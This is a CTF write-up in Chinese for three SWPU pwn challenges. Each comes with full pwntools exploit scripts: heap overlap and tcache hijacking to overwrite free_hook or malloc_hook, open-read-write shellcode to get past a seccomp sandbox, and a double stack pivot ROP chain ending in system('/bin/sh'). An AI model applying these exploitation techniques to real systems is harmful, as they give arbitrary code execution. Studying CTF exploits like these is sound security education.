SWPU 部分wp

过去的SWPU的题目搬出来做一下

tnote:

off by one堆重叠泄露堆地址
然后劫持到tcache struct(heap_base+0x10处),修改counts泄露libc,然后正常打free_hook
exp:

from pwn import *
# pwntools setup: verbose traffic logging, x86-64 target, and a tmux split for the
# (commented-out) gdb.attach call further down.
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])

# Remote target; swap in the commented process() line to run against a local copy.
io=remote("node2.anna.nssctf.cn",28240)
# io=process("./service")
elf=ELF("./service")
libc=ELF("./libc-2.27.so")  # challenge libc; the libc.sym offsets used below come from it

def add(s):
    """Menu option A (add): choose it, then answer the size prompt with ``s``."""
    for marker, answer in ((b"choice: ", b"A"), (b"size?", str(s))):
        io.sendlineafter(marker, answer)
    
def edit(n,cc):
    """Menu option E (edit): select index ``n`` and send ``cc`` at the content prompt."""
    steps = (
        (b"choice: ", b"E"),
        (b"idx?", str(n)),
        (b"content:", cc),
    )
    for marker, answer in steps:
        io.sendlineafter(marker, answer)
    
def show(n):
    """Menu option S (show): print the note at index ``n``; the caller reads the output."""
    for marker, answer in ((b"choice: ", b"S"), (b"idx?", str(n))):
        io.sendlineafter(marker, answer)
    
def delete(n):
    """Menu option D (delete): release the note at index ``n``."""
    for marker, answer in ((b"choice: ", b"D"), (b"idx?", str(n))):
        io.sendlineafter(marker, answer)

# gdb.attach(io)
# pause()

# tnote exploit sequence (see the notes above): heap-address leak, then libc leak,
# then free_hook overwrite. The trailing "#N" on an add() is the note index it gets.
add(0x18) #0
add(0x18) #1
add(0x78) #2
add(0x10) #3

edit(0,cyclic(0x18)+p64(0x61))  # overflow past note 0 into the next chunk's header (the off-by-one from the note above)
delete(1)   
delete(2)
# edit(0,cyclic(0x18)+p64(0x81))
add(0x50) #1  index reuse: freed indices are handed out again in delete order
edit(1,b"a"*0x27+b"b")
show(1)
io.recvuntil(b"b")
heap_addr=u64(io.recv(6).ljust(8,b"\x00"))-0x10 # leak the heap address
print("heap_addr: "+hex(heap_addr))

edit(1,b"a"*0x18+p64(0x81)+p64(heap_addr+0x10)+p64(0))
add(0x78) #2
add(0x78) #4
edit(4,b"\x07"*0x40+p64(0)*6+p64(heap_addr+0x10))
delete(4)
add(0x78) #4
show(4)
leak_addr=u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))-0x70-libc.sym[b"__malloc_hook"] # leak the libc base address
print("leak_addr: "+hex(leak_addr))

free_hook=leak_addr+libc.sym[b"__free_hook"]
malloc_hook=leak_addr+libc.sym[b"__malloc_hook"]  # not used further in this script
one_gadget=[0x4f3d5,0x4f432,0x10a41c]  # one_gadget offsets for this libc; their constraints are listed at the end of the script
shell=leak_addr+one_gadget[1]

edit(4,b"\x02"*0x40+p64(0)*3+p64(free_hook))
add(0x40) #5  
edit(5,p64(shell)) # point free_hook at the one_gadget

delete(5) # trigger (presumably delete -> free -> hijacked hook)

io.interactive()

# 0x4f3d5 execve("/bin/sh", rsp+0x40, environ)
# constraints:
#   rsp & 0xf == 0
#   rcx == NULL

# 0x4f432 execve("/bin/sh", rsp+0x40, environ)
# constraints:
#   [rsp+0x40] == NULL

# 0x10a41c execve("/bin/sh", rsp+0x70, environ)
# constraints:
#   [rsp+0x70] == NULL

p1KkHeap:

开启沙盒禁用execve()
mmap开辟rwx段
劫持hook到rwx段上地址打orw shellcode即可
同样需要打tcache struct,注意构造tcachebin的大小
exp:

from pwn import *
# pwntools setup: verbose traffic logging, x86-64 target, and a tmux split for the
# (commented-out) gdb.attach call further down.
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])

# Remote target; swap in the commented process() line to run against a local copy.
io=remote("node1.anna.nssctf.cn",28176)
# io=process("./SWPUCTF_2019_p1KkHeap")
elf=ELF("./SWPUCTF_2019_p1KkHeap")
libc=ELF("./libc-2.27.so")  # challenge libc; the libc.sym offsets used below come from it

def add(s):
    """Menu option 1 (add): choose it, then answer the size prompt with ``s``."""
    for marker, answer in ((b"Choice: ", b"1"), (b"size: ", str(s))):
        io.sendlineafter(marker, answer)

def show(n):
    """Menu option 2 (show): print the chunk with id ``n``; the caller reads the output."""
    for marker, answer in ((b"Choice: ", b"2"), (b"id: ", str(n))):
        io.sendlineafter(marker, answer)
    
def edit(n,cc):
    """Menu option 3 (edit): select id ``n``, then write ``cc`` at the content prompt.

    The content itself goes through ``sendafter`` (no trailing newline), unlike the
    menu answers, so ``cc`` is delivered byte-for-byte.
    """
    for marker, answer in ((b"Choice: ", b"3"), (b"id: ", str(n))):
        io.sendlineafter(marker, answer)
    io.sendafter(b"content: ", cc)

def delete(n):
    """Menu option 4 (delete): release the chunk with id ``n``."""
    for marker, answer in ((b"Choice: ", b"4"), (b"id: ", str(n))):
        io.sendlineafter(marker, answer)
    
# gdb.attach(io)
# pause()

# p1KkHeap exploit sequence (see the notes above): heap leak, libc leak, then the
# hook is pointed at the rwx mapping holding the open/read/write shellcode.
mm_addr=0x66660100  # address inside the rwx mapping mentioned in the notes (taken from the challenge binary — confirm)

add(0x100) #0
add(0x100) #1
delete(0)
delete(0)  # same id freed twice
show(0)
io.recvuntil(b"content: ")
heap_addr=u64(io.recv(6).ljust(8,b"\x00"))-0x260  # leak the heap address
print("heap_addr: "+hex(heap_addr))

add(0x100) #2
edit(2,p64(heap_addr+0x10)) 
add(0x100) #3
add(0x100) #4
edit(4,b"\x07"*0x40)
delete(0)
show(0)
leak_addr=u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))-0x70-libc.sym[b"__malloc_hook"]  # leak the libc base address
print("leak_addr: "+hex(leak_addr))

malloc_hook=leak_addr+libc.sym[b"__malloc_hook"]
# open/read/write only — the notes say execve() is blocked by the sandbox. Reads 0x50 bytes of
# "/flag" into mm_addr+0x400 and writes them to stdout.
orw_shellcode=asm(shellcraft.open("/flag")+shellcraft.read(3,mm_addr+0x400,0x50)+shellcraft.write(1,mm_addr+0x400,0x50))

edit(4,b"\x07"*0x40+p64(0)*6+p64(malloc_hook)+p64(0)+p64(mm_addr))
add(0x90) #5
edit(5,orw_shellcode)
add(0x70) #6
edit(6,p64(mm_addr))

add(0x30)  # final allocation; presumably this is what fires the hijacked malloc_hook

io.interactive()

WheretoGo:

一次溢出的栈迁移模板题,不过因为环境问题最后得迁2次
exp:

from pwn import *
# pwntools setup: verbose traffic logging, x86-64 target, and a tmux split for the
# (commented-out) gdb.attach call further down.
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])

# Remote target; swap in the commented process() line to run against a local copy.
io=remote("node2.anna.nssctf.cn",28972)
# io=process("./WheretoGo")
elf=ELF("./WheretoGo")
libc=ELF("./libc-2.31.so")  # challenge libc; the libc.sym offsets used below come from it

puts_plt=elf.plt[b"puts"]
puts_got=elf.got[b"puts"]
bk_addr=0x4011bd    # return target after the leak (presumably back into the vulnerable function — confirm in the binary)
bss_addr=0x404d00   # writable area used as the pivot destination
read_text=0x4011C9  # address inside the binary's read routine, re-entered after each pivot (assumed)
leave_ret=0x4011e0  # "leave ; ret" — see the gadget dump at the end of the script
pop_rdi=0x4012d3    # "pop rdi ; ret" — see the gadget dump at the end of the script

# WheretoGo exploit sequence (see the note above): the single overflow is used twice —
# round 1 pivots and calls puts(puts_got) to leak libc, round 2 pivots again to system("/bin/sh").
io.recvuntil(b"go?\n")
payload=cyclic(0x80)+p64(bss_addr)+p64(read_text)  # round 1, step 1: saved rbp -> bss_addr, return into read
payload=payload.ljust(0x100,b"a")
io.send(payload)

payload=p64(0)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(bk_addr)  # round 1, step 2: leak chain written at bss_addr
payload=payload.ljust(0x80,b"\x00")+p64(bss_addr-0x80)+p64(leave_ret)
payload=payload.ljust(0x100,b"a")
io.send(payload)

leak_addr=u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))-libc.sym[b"puts"]  # libc base from the leaked puts address
print("leak_addr: "+hex(leak_addr))
sys_addr=leak_addr+libc.sym[b"system"]
str_bin_sh=leak_addr+next(libc.search(b"/bin/sh"))


payload=cyclic(0x80)+p64(bss_addr-0x200-0x8)+p64(read_text)  # round 2, step 1: pivot to a fresh region below the first
payload=payload.ljust(0x100,b"a")
io.send(payload)

# gdb.attach(io)
# pause()

payload=p64(0)+p64(pop_rdi)+p64(str_bin_sh)+p64(sys_addr)  # round 2, step 2: system("/bin/sh") chain
payload=payload.ljust(0x80,b"\x00")+p64(bss_addr-0x280-0x8)+p64(leave_ret)
payload=payload.ljust(0x100,b"a")
io.send(payload)


# Earlier single-pivot attempt, kept by the author for reference:
# payload=cyclic(0x88)+p64(pop_rdi)+p64(str_bin_sh)+p64(sys_addr)
# io.send(payload)


io.interactive()

# Gadgets information
# ============================================================
# 0x00000000004011e0 : leave ; ret
# 0x00000000004012cc : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x00000000004012ce : pop r13 ; pop r14 ; pop r15 ; ret
# 0x00000000004012d0 : pop r14 ; pop r15 ; ret
# 0x00000000004012d2 : pop r15 ; ret
# 0x00000000004012cb : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x00000000004012cf : pop rbp ; pop r14 ; pop r15 ; ret
# 0x000000000040115d : pop rbp ; ret
# 0x00000000004012d3 : pop rdi ; ret
# 0x00000000004012d1 : pop rsi ; pop r15 ; ret
# 0x00000000004012cd : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x000000000040101a : ret

# Unique gadgets found: 12